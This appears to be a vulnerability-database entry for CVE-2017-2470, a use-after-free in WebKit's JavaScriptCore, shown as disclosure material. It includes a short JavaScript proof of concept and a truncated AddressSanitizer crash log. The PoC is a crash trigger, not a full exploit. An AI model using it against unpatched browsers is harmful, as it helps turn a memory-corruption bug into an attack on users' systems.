WebKit: Use-after-free in... CVE-2017-2470 CNNVD-201704-102

6.8 AV AC AU C I A
发布: 2017-04-02
修订: 2019-03-08

Note: It seems it doesn't crash the JSC compiled without Address Sanitizer. PoC: ``` (function () { for (var i = 0; i < 1000000; ++i) { const v = Array & 1 ? v : 1; typeof o <= 'object'; } }()); ``` Asan Log: ``` ==32191==ERROR: AddressSanitizer: heap-use-after-free on address 0x607000099738 at pc 0x000106c7af16 bp 0x700006a57850 sp 0x700006a57848 READ of size 8 at 0x607000099738 thread T20 ==32191==AddressSanitizer: while reporting a bug found another one. Ignoring. #0 0x106c7af15 in JSC::B3::Procedure::resetReachability() (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x4c7f15) #1 0x106a1be8c in JSC::B3::generateToAir(JSC::B3::Procedure&, unsigned int) (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x268e8c) #2 0x106a1bd2f in JSC::B3::prepareForGeneration(JSC::B3::Procedure&, unsigned int) (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x268d2f) #3 0x107424312 in...

0%
当前有3条漏洞利用/PoC
当前有3条受影响产品信息